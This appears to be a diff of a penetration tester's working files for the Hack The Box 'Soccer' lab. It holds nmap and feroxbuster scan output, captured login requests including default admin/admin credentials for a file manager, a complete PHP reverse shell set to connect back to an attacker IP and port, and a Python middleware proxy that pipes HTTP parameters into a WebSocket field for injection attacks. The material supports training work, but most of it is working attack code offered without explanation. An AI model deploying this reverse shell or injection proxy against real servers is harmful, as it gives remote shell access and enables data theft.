+<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="http" product="nginx" version="1.18.0" extrainfo="Ubuntu" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:igor_sysoev:nginx:1.18.0</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="http-title" output="Soccer - Index "><elem key="title">Soccer - Index </elem>
+</script><script id="http-methods" output="&#xa;  Supported Methods: GET HEAD"><table key="Supported Methods">
+<elem>GET</elem>
+<elem>HEAD</elem>
+</table>
+</script><script id="http-server-header" output="nginx/1.18.0 (Ubuntu)"><elem>nginx/1.18.0 (Ubuntu)</elem>
+</script></port>
+<port protocol="tcp" portid="9091"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="xmltec-xmlmail" servicefp="SF-Port9091-TCP:V=7.93%I=9%D=1/27%Time=63D39C53%P=x86_64-pc-linux-gnu%r(informix,2F,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n&quot;)%r(drda,2F,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n&quot;)%r(GetRequest,168,&quot;HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x20default-src\x20&apos;none&apos;\r\nX-Content-Type-Options:\x20nosniff\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20139\r\nDate:\x20Fri,\x2027\x20Jan\x202023\x2009:41:45\x20GMT\r\nConnection:\x20close\r\n\r\n&lt;!DOCTYPE\x20html&gt;\n&lt;html\x20lang=\&quot;en\&quot;&gt;\n&lt;head&gt;\n&lt;meta\x20charset=\&quot;utf-8\&quot;&gt;\n&lt;title&gt;Error&lt;/title&gt;\n&lt;/head&gt;\n&lt;body&gt;\n&lt;pre&gt;Cannot\x20GET\x20/&lt;/pre&gt;\n&lt;/body&gt;\n&lt;/html&gt;\n&quot;)%r(HTTPOptions,16C,&quot;HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x20default-src\x20&apos;none&apos;\r\nX-Content-Type-Options:\x20nosniff\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20143\r\nDate:\x20Fri,\x2027\x20Jan\x202023\x2009:41:45\x20GMT\r\nConnection:\x20close\r\n\r\n&lt;!DOCTYPE\x20html&gt;\n&lt;html\x20lang=\&quot;en\&quot;&gt;\n&lt;head&gt;\n&lt;meta\x20charset=\&quot;utf-8\&quot;&gt;\n&lt;title&gt;Error&lt;/title&gt;\n&lt;/head&gt;\n&lt;body&gt;\n&lt;pre&gt;Cannot\x20OPTIONS\x20/&lt;/pre&gt;\n&lt;/body&gt;\n&lt;/html&gt;\n&quot;)%r(RTSPRequest,16C,&quot;HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x20default-src\x20&apos;none&apos;\r\nX-Content-Type-Options:\x20nosniff\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20143\r\nDate:\x20Fri,\x2027\x20Jan\x202023\x2009:41:45\x20GMT\r\nConnection:\x20close\r\n\r\n&lt;!DOCTYPE\x20html&gt;\n&lt;html\x20lang=\&quot;en\&quot;&gt;\n&lt;head&gt;\n&lt;meta\x20charset=\&quot;utf-8\&quot;&gt;\n&lt;title&gt;Error&lt;/title&gt;\n&lt;/head&gt;\n&lt;body&gt;\n&lt;pre&gt;Cannot\x20OPTIONS\x20/&lt;/pre&gt;\n&lt;/body&gt;\n&lt;/html&gt;\n&quot;)%r(RPCCheck,2F,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n&quot;)%r(DNSVersionBindReqTCP,2F,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n&quot;)%r(DNSStatusRequestTCP,2F,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n&quot;)%r(Hello,2F,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n&quot;)%r(Help,2F,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n&quot;);" method="table" conf="3"/><script id="fingerprint-strings" output="&#xa;  DNSStatusRequestTCP, DNSVersionBindReqTCP, Hello, Help, RPCCheck, drda, informix: &#xa;    HTTP/1.1 400 Bad Request&#xa;    Connection: close&#xa;  GetRequest: &#xa;    HTTP/1.1 404 Not Found&#xa;    Content-Security-Policy: default-src &apos;none&apos;&#xa;    X-Content-Type-Options: nosniff&#xa;    Content-Type: text/html; charset=utf-8&#xa;    Content-Length: 139&#xa;    Date: Fri, 27 Jan 2023 09:41:45 GMT&#xa;    Connection: close&#xa;    &lt;!DOCTYPE html&gt;&#xa;    &lt;html lang=&quot;en&quot;&gt;&#xa;    &lt;head&gt;&#xa;    &lt;meta charset=&quot;utf-8&quot;&gt;&#xa;    &lt;title&gt;Error&lt;/title&gt;&#xa;    &lt;/head&gt;&#xa;    &lt;body&gt;&#xa;    &lt;pre&gt;Cannot GET /&lt;/pre&gt;&#xa;    &lt;/body&gt;&#xa;    &lt;/html&gt;&#xa;  HTTPOptions, RTSPRequest: &#xa;    HTTP/1.1 404 Not Found&#xa;    Content-Security-Policy: default-src &apos;none&apos;&#xa;    X-Content-Type-Options: nosniff&#xa;    Content-Type: text/html; charset=utf-8&#xa;    Content-Length: 143&#xa;    Date: Fri, 27 Jan 2023 09:41:45 GMT&#xa;    Connection: close&#xa;    &lt;!DOCTYPE html&gt;&#xa;    &lt;html lang=&quot;en&quot;&gt;&#xa;    &lt;head&gt;&#xa;    &lt;meta charset=&quot;utf-8&quot;&gt;&#xa;    &lt;title&gt;Error&lt;/title&gt;&#xa;    &lt;/head&gt;&#xa;    &lt;body&gt;&#xa;    &lt;pre&gt;Cannot OPTIONS /&lt;/pre&gt;&#xa;    &lt;/body&gt;&#xa;    &lt;/html&gt;"><elem key="DNSStatusRequestTCP, DNSVersionBindReqTCP, Hello, Help, RPCCheck, drda, informix">&#xa;    HTTP/1.1 400 Bad Request&#xa;    Connection: close</elem>
+<elem key="GetRequest">&#xa;    HTTP/1.1 404 Not Found&#xa;    Content-Security-Policy: default-src &apos;none&apos;&#xa;    X-Content-Type-Options: nosniff&#xa;    Content-Type: text/html; charset=utf-8&#xa;    Content-Length: 139&#xa;    Date: Fri, 27 Jan 2023 09:41:45 GMT&#xa;    Connection: close&#xa;    &lt;!DOCTYPE html&gt;&#xa;    &lt;html lang=&quot;en&quot;&gt;&#xa;    &lt;head&gt;&#xa;    &lt;meta charset=&quot;utf-8&quot;&gt;&#xa;    &lt;title&gt;Error&lt;/title&gt;&#xa;    &lt;/head&gt;&#xa;    &lt;body&gt;&#xa;    &lt;pre&gt;Cannot GET /&lt;/pre&gt;&#xa;    &lt;/body&gt;&#xa;    &lt;/html&gt;</elem>
+<elem key="HTTPOptions, RTSPRequest">&#xa;    HTTP/1.1 404 Not Found&#xa;    Content-Security-Policy: default-src &apos;none&apos;&#xa;    X-Content-Type-Options: nosniff&#xa;    Content-Type: text/html; charset=utf-8&#xa;    Content-Length: 143&#xa;    Date: Fri, 27 Jan 2023 09:41:45 GMT&#xa;    Connection: close&#xa;    &lt;!DOCTYPE html&gt;&#xa;    &lt;html lang=&quot;en&quot;&gt;&#xa;    &lt;head&gt;&#xa;    &lt;meta charset=&quot;utf-8&quot;&gt;&#xa;    &lt;title&gt;Error&lt;/title&gt;&#xa;    &lt;/head&gt;&#xa;    &lt;body&gt;&#xa;    &lt;pre&gt;Cannot OPTIONS /&lt;/pre&gt;&#xa;    &lt;/body&gt;&#xa;    &lt;/html&gt;</elem>
+</script></port>
+</ports>
+<times srtt="32653" rttvar="9141" to="100000"/>
+</host>
+<taskbegin task="NSE" time="1674812538"/>
+<taskend task="NSE" time="1674812538"/>
+<taskbegin task="NSE" time="1674812538"/>
+<taskend task="NSE" time="1674812538"/>
+<taskbegin task="NSE" time="1674812538"/>
+<taskend task="NSE" time="1674812538"/>
+<runstats><finished time="1674812538" timestr="Fri Jan 27 10:42:18 2023" summary="Nmap done at Fri Jan 27 10:42:18 2023; 1 IP address (1 host up) scanned in 46.59 seconds" elapsed="46.59" exit="success"/><hosts up="1" down="0" total="1"/>
+</runstats>
+</nmaprun>
--- a/HTB/soccer/shell.php
+++ b/HTB/soccer/shell.php
@@ -0,0 +1,116 @@
+<?php
+// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
+// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
+
+set_time_limit (0);
+$VERSION = "1.0";
+$ip = '10.10.16.2';
+$port = 4444;
+$chunk_size = 1400;
+$write_a = null;
+$error_a = null;
+$shell = 'uname -a; w; id; sh -i';
+$daemon = 0;
+$debug = 0;
+
+if (function_exists('pcntl_fork')) {
+	$pid = pcntl_fork();
+	
+	if ($pid == -1) {
+		printit("ERROR: Can't fork");
+		exit(1);
+	}
+	
+	if ($pid) {
+		exit(0);  // Parent exits
+	}
+	if (posix_setsid() == -1) {
+		printit("Error: Can't setsid()");
+		exit(1);
+	}
+
+	$daemon = 1;
+} else {
+	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
+}
+
+chdir("/");
+
+umask(0);
+
+// Open reverse connection
+$sock = fsockopen($ip, $port, $errno, $errstr, 30);
+if (!$sock) {
+	printit("$errstr ($errno)");
+	exit(1);
+}
+
+$descriptorspec = array(
+   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
+   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
+   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
+);
+
+$process = proc_open($shell, $descriptorspec, $pipes);
+
+if (!is_resource($process)) {
+	printit("ERROR: Can't spawn shell");
+	exit(1);
+}
+
+stream_set_blocking($pipes[0], 0);
+stream_set_blocking($pipes[1], 0);
+stream_set_blocking($pipes[2], 0);
+stream_set_blocking($sock, 0);
+
+printit("Successfully opened reverse shell to $ip:$port");
+
+while (1) {
+	if (feof($sock)) {
+		printit("ERROR: Shell connection terminated");
+		break;
+	}
+
+	if (feof($pipes[1])) {
+		printit("ERROR: Shell process terminated");
+		break;
+	}
+
+	$read_a = array($sock, $pipes[1], $pipes[2]);
+	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
+
+	if (in_array($sock, $read_a)) {
+		if ($debug) printit("SOCK READ");
+		$input = fread($sock, $chunk_size);
+		if ($debug) printit("SOCK: $input");
+		fwrite($pipes[0], $input);
+	}
+
+	if (in_array($pipes[1], $read_a)) {
+		if ($debug) printit("STDOUT READ");
+		$input = fread($pipes[1], $chunk_size);
+		if ($debug) printit("STDOUT: $input");
+		fwrite($sock, $input);
+	}
+
+	if (in_array($pipes[2], $read_a)) {
+		if ($debug) printit("STDERR READ");
+		$input = fread($pipes[2], $chunk_size);
+		if ($debug) printit("STDERR: $input");
+		fwrite($sock, $input);
+	}
+}
+
+fclose($sock);
+fclose($pipes[0]);
+fclose($pipes[1]);
+fclose($pipes[2]);
+proc_close($process);
+
+function printit ($string) {
+	if (!$daemon) {
+		print "$string\n";
+	}
+}
+
+?>
--- a/HTB/soccer/soclogin.req
+++ b/HTB/soccer/soclogin.req
@@ -0,0 +1,15 @@
+POST /login HTTP/1.1
+Host: soc-player.soccer.htb
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 39
+Origin: http://soc-player.soccer.htb
+Connection: close
+Referer: http://soc-player.soccer.htb/login
+Cookie: connect.sid=s%3AMwGmA_eFDNWUjllDK13_ibdYxcOBV1zL.3WIpWasA9nMP8%2BCa3ZJH4OhIX2j48LKpIt0O43TOCDE
+Upgrade-Insecure-Requests: 1
+
+email=email%40example.com&password=pass
--- a/HTB/soccer/tiny.req
+++ b/HTB/soccer/tiny.req
@@ -0,0 +1,15 @@
+POST /tiny/tinyfilemanager.php HTTP/1.1
+Host: soccer.htb
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 25
+Origin: http://soccer.htb
+Connection: close
+Referer: http://soccer.htb/tiny/tinyfilemanager.php
+Cookie: filemanager=n2fjf2tdrg9vbs0ql9krqn6gi1
+Upgrade-Insecure-Requests: 1
+
+fm_usr=admin&fm_pwd=admin
--- a/HTB/soccer/users
+++ b/HTB/soccer/users
@@ -0,0 +1,3 @@
+soccer
+admin
+
--- a/HTB/soccer/ws.req
+++ b/HTB/soccer/ws.req
@@ -0,0 +1 @@
+{"id":"61334"}
--- a/HTB/soccer/wsproxy.py
+++ b/HTB/soccer/wsproxy.py
@@ -0,0 +1,71 @@
+import logging
+from http.server import SimpleHTTPRequestHandler
+from socketserver import TCPServer
+from urllib.parse import unquote, urlparse
+from websocket import create_connection
+
+ws_server = "ws://soc-player.soccer.htb:9091"
+logging.basicConfig(
+    level=logging.DEBUG,
+    format='%(asctime)s %(name)s %(levelname)-8s  %(message)s',
+    datefmt='(%H:%M:%S)')
+
+# disable all loggers from different files
+logging.getLogger('asyncio').setLevel(logging.ERROR)
+logging.getLogger('asyncio.coroutines').setLevel(logging.ERROR)
+logging.getLogger('websockets.server').setLevel(logging.ERROR)
+logging.getLogger('websockets.protocol').setLevel(logging.ERROR)
+ws = create_connection(ws_server)
+def send_ws(payload):
+    # If the server returns a response on connect, use below line
+    # resp = ws.recv() # If server returns something like a token on connect you can find and extract from here
+
+    # For our case, format the payload in JSON
+    message = unquote(payload).replace('"', '\'')  # replacing " with ' to avoid breaking JSON structure
+    data = '{"employeeID":"`%s`"}' % message
+
+    ws.send(data)
+    resp = ws.recv()
+    if resp != "Ticket Doesn't Exist":
+        print(resp)
+        print(data)
+
+    if resp:
+        return resp
+    else:
+        return ''
+
+
+def middleware_server(host_port, content_type="text/plain"):
+    class CustomHandler(SimpleHTTPRequestHandler):
+        def do_GET(self) -> None:
+            self.send_response(200)
+            try:
+                payload = urlparse(self.path).query.split('=', 1)[1]
+            except IndexError:
+                payload = False
+
+            if payload:
+                content = send_ws(payload)
+            else:
+                content = 'No parameters specified!'
+
+            self.send_header("Content-type", content_type)
+            self.end_headers()
+            self.wfile.write(content.encode())
+            return
+
+    class _TCPServer(TCPServer):
+        allow_reuse_address = True
+
+    httpd = _TCPServer(host_port, CustomHandler)
+    httpd.serve_forever()
+
+
+print("[+] Starting MiddleWare Server")
+print("[+] Send payloads in http://localhost:8081/?id=*")
+
+try:
+    middleware_server(('0.0.0.0', 8081))
+except KeyboardInterrupt:
+    pass
				`@@ -0,0 +1 @@`
				{"scans":[{"id":"2689ff59b1bb4952bd0760a96a0670d3","url":"http://10.10.11.194:80/","normalized_url":"http://10.10.11.194:80/","scan_type":"Directory","status":"Running","num_requests":1543822}],"config":{"type":"configuration","wordlist":"/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt","config":"/etc/feroxbuster/ferox-config.toml","proxy":"","replay_proxy":"","target_url":"http://10.10.11.194:80/","status_codes":[200,204,301,302,307,308,401,403,405,500],"replay_codes":[200,204,301,302,307,308,401,403,405,500],"filter_status":[],"threads":50,"timeout":7,"verbosity":1,"silent":false,"quiet":true,"auto_bail":false,"auto_tune":false,"json":false,"output":"/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt","debug_log":"","user_agent":"feroxbuster/2.7.3","random_agent":false,"redirects":false,"insecure":true,"extensions":["txt","html","php","asp","aspx","jsp"],"methods":["GET"],"data":[],"headers":{},"queries":[],"no_recursion":false,"extract_links":true,"add_slash":false,"stdin":false,"depth":4,"scan_limit":0,"parallel":0,"rate_limit":0,"filter_size":[],"filter_line_count":[],"filter_word_count":[],"filter_regex":[],"dont_filter":false,"resumed":false,"resume_from":"","save_state":true,"time_limit":"","filter_similar":[],"url_denylist":[],"regex_denylist":[],"collect_extensions":false,"dont_collect":["tif","tiff","ico","cur","bmp","webp","svg","png","jpg","jpeg","jfif","gif","avif","apng","pjpeg","pjp","mov","wav","mpg","mpeg","mp3","mp4","m4a","m4p","m4v","ogg","webm","ogv","oga","flac","aac","3gp","css","zip","xls","xml","gz","tgz"],"collect_backups":false,"collect_words":false,"force_recursion":false},"responses":[{"type":"response","url":"http://10.10.11.194/09d1efe14b0747d9a4f8be3e7aa30913","original_url":"http://10.10.11.194:80/","path":"/09d1efe14b0747d9a4f8be3e7aa30913","wildcard":true,"status":301,"method":"GET","content_length":178,"line_count":7,"word_count":12,"headers":{"server":"nginx/1.18.0 (Ubuntu)","connection":"keep-alive","content-length":"178","location":"http://soccer.htb/09d1efe14b0747d9a4f8be3e7aa30913","content-type":"text/html","date":"Wed, 25 Jan 2023 15:54:11 GMT"},"extension":""},{"type":"response","url":"http://10.10.11.194/71abea99cb5147799a27f2ebfeb66255a7c396b7c7dd43a3b4d9e8566f2c2137400ca2109ffd4c8985227c3b004a6257","original_url":"http://10.10.11.194:80/","path":"/71abea99cb5147799a27f2ebfeb66255a7c396b7c7dd43a3b4d9e8566f2c2137400ca2109ffd4c8985227c3b004a6257","wildcard":true,"status":301,"method":"GET","content_length":178,"line_count":7,"word_count":12,"headers":{"server":"nginx/1.18.0 (Ubuntu)","date":"Wed, 25 Jan 2023 15:54:11 GMT","content-length":"178","connection":"keep-alive","location":"http://soccer.htb/71abea99cb5147799a27f2ebfeb66255a7c396b7c7dd43a3b4d9e8566f2c2137400ca2109ffd4c8985227c3b004a6257","content-type":"text/html"},"extension":""}],"statistics":{"type":"statistics","timeouts":632,"requests":1024705,"expected_per_scan":1543822,"total_expected":1543822,"errors":659,"successes":0,"redirects":1024045,"client_errors":1,"server_errors":0,"total_scans":1,"initial_targets":0,"links_extracted":0,"extensions_collected":0,"status_200s":0,"status_301s":1024045,"status_302s":0,"status_401s":0,"status_403s":0,"status_429s":0,"status_500s":0,"status_503s":0,"status_504s":0,"status_508s":0,"wildcards_filtered":1024041,"responses_filtered":1024041,"resources_discovered":2,"url_format_errors":0,"redirection_errors":0,"connection_errors":27,"request_errors":0,"directory_scan_times":[],"total_runtime":[0.0]},"collected_extensions":[],"filters":[{"dynamic":18446744073709551615,"size":178,"method":"GET","dont_filter":false}]}